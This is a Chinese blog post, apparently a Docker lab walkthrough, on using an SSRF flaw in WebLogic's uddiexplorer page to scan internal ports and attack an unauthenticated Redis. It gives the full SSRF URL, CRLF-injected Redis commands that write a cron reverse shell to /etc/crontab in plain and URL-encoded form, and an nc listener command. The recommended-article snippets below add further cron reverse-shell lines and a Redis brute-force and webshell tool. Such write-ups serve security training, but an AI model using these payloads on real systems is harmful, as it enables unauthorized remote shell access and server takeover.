ssrf,利用redis反弹shell

最新推荐文章于 2023-12-29 08:43:57 发布
最新推荐文章于 2023-12-29 08:43:57 发布
阅读量395 收藏 2
点赞数
文章标签: 安全 php 开发语言 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67757718/article/details/129661072
版权

使用docker-compose up -d 命令在docker中拉取镜像

使用docker ps命令查看进程,看到weblogic和redis这两个服务开启

在网页中打开yourIP:7001/uddiexplorer的页面

http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp页面中存在ssrf漏洞

构造payload

http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http:// 可访问的IP:port

当访问的IP存活时,报出如上图所示错误

加上端口,用bp抓一下包,页面右侧报出所示错误,证明开放了7001端口

当我尝试将7001改为其他未开放的端口时,报出如下图右侧所示的错误

通过上面的尝试发现,通过页面返回错误的不同,可以探测内网端口的开放状态,进而知道内网开启的服务,同时加以利用

使用docker ps命令查看一下进程号

docker exec -it 进程号 /bin/bash

进入容器,ifconfig查看一下IP

将operator参数后面的值改为redis的IP和端口号,redis的默认端口号位6379,send一下,报出下图右侧所示错误,证明redis服务开启

默认情况下redis处于公网中会被任意的用户未授权访问,读取数据,利用redis自身的命令,进行写入文件操作,这样就会恶意攻击者利用redis未授权漏洞进行进一步攻击。

将反弹shell脚本写入redis容器里面的/etc/crontab,从而将shell反弹到yourip的6666端口

test 
 
 
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/yourIP/6666 0>&1\n\n\n\n"
 
config set dir /etc/
 
config set dbfilename crontab save 
 
 
aaa

URL编码

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FyourIP%2F6666%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

上传成功

我们可以在redis容器里面进入etc目录,使用cat crontab命令查看一下,发现成功写入

退出容器

使用nc -lvvp 6666 命令开启监听端口

等待一会,成功反弹shell

哒咩212
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
redis计划任务反弹shell
干铮的博客
01-31 2689
1.环境搭建 Ubuntu16.04安装redis sudo apt-get install redis-server vim /etc/redis/redis.conf 注释掉密码和仅允许本地访问 kali 安装redis-cli进行连接 wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable make //全局生效 cp src/redis
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 2340
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2178
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
Redis未授权访问反弹shell
Sylon的博客
11-21 1389
0x01:前言 这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!! Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis开发工作由VMware主持。从2013年5月开始,Redis开发由Pivotal赞助。 Redis因配置不当可以未授权访问(窃取数据、反弹sh...
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
通过 SSRF 操作 Redis 主从 RCE1
08-04
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2083
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
redis 未授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1221
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至。
12-29 1760
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
Redis未授权访问反弹shell记录
fengqingyuel的博客
10-09 371
环境配置情况: 攻击机:kali-2021.2 ,配置IP:10.1.25.44 redis靶机:CentOS 7.2 ,配置IP:10.3.70.70 1、在攻击机(10.1.25.44)先建立监听。 nc -nvlp 7788 2、在连接redis的客户端依次执行以下命令。 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n" //往当前用户的cronta
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5535
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
SSRF在Redis反弹shell
weixin_34126215的博客
05-27 988
搭个环境怪不容易的,求大佬们放过。。。 参考文献:https://joychou.org/web/phpssrf.htmlhttps://www.anquanke.com/post/id/146417 SSRF概念 SSRF(Server-Side Request Forgery),服务端请求伪造,利用漏...
Redis RCE 反弹shell 漏洞复现
06-07 1018
1 Redis简介 Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库,并提供多种语言的API 环境搭建
ubuntu的redis反弹shell总结
qq_15042405的博客
02-25 1306
ubuntu的redis反弹shell总结 ubuntu要执行有三点: 1、ubuntu的默认执行命令的为/bin/dash,我们使用bash -i肯定是弹不了的。 2、ubuntu计划任务运行有语法要求,redis写入的文件存在缓存数据,导致语法错误无法运行计划任务。 3、文件需要是600 rw权限,权限不对也不能运行,不过我直接写入貌似就是600 rw。 参考链接:http://www.vkxss.top/2019/05/28/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-R
五、利用redis计划任务反弹shell
dahege666的博客
03-02 2340
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 1.先用kali监听接收shell的端口: 2.连接redis,创建一个key x,值为反弹shell语句,修改备份目录为linux计划任务目录,修改备份文件名为 root,以root身体执行计划任务 3.执行完后回到监听终端页面,但是反弹的...
ssrf与redis
最新发布
04-27
SSRF攻击与Redis之间的关联在于,攻击者可以利用SSRF漏洞来发起针对Redis的攻击。具体来说,攻击者可以通过构造恶意请求,将Redis服务器的内部数据暴露给外部,或者通过修改Redis配置文件来实施攻击。 为了防止SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值